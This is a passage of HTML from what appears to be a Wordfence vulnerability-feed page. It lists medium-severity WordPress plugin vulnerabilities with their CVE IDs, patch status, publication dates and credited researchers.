						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84024" target="_blank" rel="noopener noreferrer">							CVE-2026-84024						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 12, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-bulk-editor" target="_blank" rel="noopener">BEAR – Bulk Editor for WooCommerce Professional. AI assistant on board (MCP Server)</a> <span class="wfvr-software-slug">[woo-bulk-editor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ali-mousavi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/14d108451720dcd5393c98321cf438a8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="14d108451720dcd5393c98321cf438a8"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ali-mousavi" target="_blank" rel="noopener">Ali Mousavi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2d833841-2482-4bc5-9b6b-aaab0bbf87ae" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8c2965c0-a07f-46a2-b06c-fa2e739aea94" target="_blank" rel="noopener">BuddyPress &lt;= 14.3.3 &#8211; Insecure Direct Object Reference to Notifications Deletion</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2024-12145" target="_blank" rel="noopener noreferrer">							CVE-2024-12145						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/buddypress" target="_blank" rel="noopener">BuddyPress</a> <span class="wfvr-software-slug">[buddypress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/brian-mungah" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f6283e349b51aae510411a5b242f1c0d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f6283e349b51aae510411a5b242f1c0d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/brian-mungah" target="_blank" rel="noopener">Brian Mungai</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8c2965c0-a07f-46a2-b06c-fa2e739aea94" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/374c8bc8-83b1-48d3-877a-f6c8fa2f044b" target="_blank" rel="noopener">Builderall for WordPress &lt;= 3.0.2 &#8211; Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Meta Modification via &#8216;ba_cheetah_data[post_id]&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15823" target="_blank" rel="noopener noreferrer">							CVE-2026-15823						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/builderall-cheetah-for-wp" target="_blank" rel="noopener">Builderall for WordPress</a> <span class="wfvr-software-slug">[builderall-cheetah-for-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/374c8bc8-83b1-48d3-877a-f6c8fa2f044b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6d780de5-d333-4af9-b9d8-0d6c8254dd05" target="_blank" rel="noopener">Checkout Custom Fields Builder for WooCommerce &lt;= 1.1.5 &#8211; Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation via &#8216;plugin&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19802" target="_blank" rel="noopener noreferrer">							CVE-2026-19802						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/checkout-custom-fields-builder-for-woocommerce" target="_blank" rel="noopener">Checkout Custom Fields Builder for WooCommerce</a> <span class="wfvr-software-slug">[checkout-custom-fields-builder-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6d780de5-d333-4af9-b9d8-0d6c8254dd05" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8080d02a-a89a-4f26-9895-0c11c59188d9" target="_blank" rel="noopener">Directory Kit &lt;= 1.5.7 &#8211; Authenticated (Contributor+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16592" target="_blank" rel="noopener noreferrer">							CVE-2026-16592						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 12, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdirectorykit" target="_blank" rel="noopener">WP Directory Kit</a> <span class="wfvr-software-slug">[wpdirectorykit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/04dc25fcada9520afe8fb170e539d8b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="04dc25fcada9520afe8fb170e539d8b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener">Yaswanth Reddy Sunkara</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8080d02a-a89a-4f26-9895-0c11c59188d9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dd7baa69-88f7-4546-96c8-4829a63d0a99" target="_blank" rel="noopener">Eventin – Event Calendar, Event Registration, Tickets &amp; Booking (AI Powered) &lt;= 4.1.22 &#8211; Authenticated (Subscriber+) Missing Authorization to Order Completion / Free Ticket Redemption</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15398" target="_blank" rel="noopener noreferrer">							CVE-2026-15398						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-event-solution" target="_blank" rel="noopener">Eventin – Event Calendar, Tickets, Registration, Booking &amp; WooCommerce</a> <span class="wfvr-software-slug">[wp-event-solution]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dd7baa69-88f7-4546-96c8-4829a63d0a99" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/894ef079-8c57-4e69-94a9-0be71f2f6176" target="_blank" rel="noopener">ilGhera Reviso Exporter for WooCommerce &lt;= 1.2.3 &#8211; Missing Authorization to Authenticated (Subscriber+) Agreement Grant Token Deletion via disconnect_callback Function</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-8615" target="_blank" rel="noopener noreferrer">							CVE-2026-8615						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wc-exporter-for-reviso" target="_blank" rel="noopener">ilGhera Reviso Exporter for WooCommerce</a> <span class="wfvr-software-slug">[wc-exporter-for-reviso]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abhirup-konwar" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00b9210383dde323f6dbe14354fe953d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00b9210383dde323f6dbe14354fe953d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abhirup-konwar" target="_blank" rel="noopener">Legion Hunter</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/894ef079-8c57-4e69-94a9-0be71f2f6176" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c39fa559-8dcb-474e-a23f-91b91a209fab" target="_blank" rel="noopener">IMPress for IDX Broker &lt;= 3.3.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81788" target="_blank" rel="noopener noreferrer">							CVE-2026-81788						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/idx-broker-platinum" target="_blank" rel="noopener">IMPress for IDX Broker</a> <span class="wfvr-software-slug">[idx-broker-platinum]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-dinh-hai-haind" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8e4cd282e790f13211a36b16698009cb.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8e4cd282e790f13211a36b16698009cb"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-dinh-hai-haind" target="_blank" rel="noopener">Nguyen Dinh Hai (HaiND)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c39fa559-8dcb-474e-a23f-91b91a209fab" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/96f2207a-6921-4868-8412-79da22c9acec" target="_blank" rel="noopener">MailMunch – Grow your Email List &lt;= 3.2.5 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81783" target="_blank" rel="noopener noreferrer">							CVE-2026-81783						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailmunch" target="_blank" rel="noopener">MailMunch – Grow your Email List</a> <span class="wfvr-software-slug">[mailmunch]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/96f2207a-6921-4868-8412-79da22c9acec" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fe4b3cab-eda2-45b1-8c38-57bd8381d5b3" target="_blank" rel="noopener">Master Addons for Elementor – Elementor Addons, Widgets, Mega Menu Builder, Popup Builder, Widget Builder &amp; Template Kits &lt;= 3.2.2 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62089" target="_blank" rel="noopener noreferrer">							CVE-2026-62089						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/master-addons" target="_blank" rel="noopener">Master Addons for Elementor – Elementor Addons, Widgets, Mega Menu Builder, Popup Builder, Widget Builder &amp; Template Kits</a> <span class="wfvr-software-slug">[master-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/turbonexic" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c4c7257eabfabcbfa54be7eb5b7dd68c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c4c7257eabfabcbfa54be7eb5b7dd68c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/turbonexic" target="_blank" rel="noopener">TurboNexic</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fe4b3cab-eda2-45b1-8c38-57bd8381d5b3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c6c2fcc5-8995-4455-9072-8557465ecd88" target="_blank" rel="noopener">Masteriyo LMS – LMS Course Builder, Quizzes &amp; Certificates &lt;= 3.4.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62132" target="_blank" rel="noopener noreferrer">							CVE-2026-62132						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learning-management-system" target="_blank" rel="noopener">Masteriyo LMS – LMS Course Builder, Quizzes &amp; Certificates</a> <span class="wfvr-software-slug">[learning-management-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/myungyong-lee" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/12033157b67df90c715a01b49cea314d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="12033157b67df90c715a01b49cea314d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/myungyong-lee" target="_blank" rel="noopener">MYUNGYONG LEE</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c6c2fcc5-8995-4455-9072-8557465ecd88" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9df0d33d-6b07-4e5c-bfa0-6f618a969f23" target="_blank" rel="noopener">Masteriyo LMS – LMS Course Builder, Quizzes &amp; Certificates 1.14.0 &#8211; 3.4.0 &#8211; Authenticated (Custom Role+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82851" target="_blank" rel="noopener noreferrer">							CVE-2026-82851						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 12, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learning-management-system" target="_blank" rel="noopener">Masteriyo LMS – LMS Course Builder, Quizzes &amp; Certificates</a> <span class="wfvr-software-slug">[learning-management-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9df0d33d-6b07-4e5c-bfa0-6f618a969f23" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/39405c07-9576-41f4-bb49-205a0f7abb4c" target="_blank" rel="noopener">Notiqoo – Order Notification &amp; Customer Chat for WooCommerce &lt; 1.4.14 &#8211; Missing Authorization to Authenticated (Contributor+) Arbitrary Option Modification</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19840" target="_blank" rel="noopener noreferrer">							CVE-2026-19840						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wc-messaging" target="_blank" rel="noopener">Notiqoo – Order Notification &amp; Customer Chat for WooCommerce</a> <span class="wfvr-software-slug">[wc-messaging]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/seongwon-lee" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8e196345806e141d3c31b5b5d8489ec0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8e196345806e141d3c31b5b5d8489ec0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/seongwon-lee" target="_blank" rel="noopener">Seongwon Lee</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/39405c07-9576-41f4-bb49-205a0f7abb4c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0dd23096-d27f-4a50-a720-ef84d1fd7070" target="_blank" rel="noopener">Payment Plugins for PayPal WooCommerce &lt;= 2.0.25 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-80341" target="_blank" rel="noopener noreferrer">							CVE-2026-80341						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pymntpl-paypal-woocommerce" target="_blank" rel="noopener">Payment Plugins for PayPal WooCommerce</a> <span class="wfvr-software-slug">[pymntpl-paypal-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/m1w34p0n" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ff958e29920c1592e3f93275db2c8014.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ff958e29920c1592e3f93275db2c8014"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/m1w34p0n" target="_blank" rel="noopener">m1w34p0n</a></div>
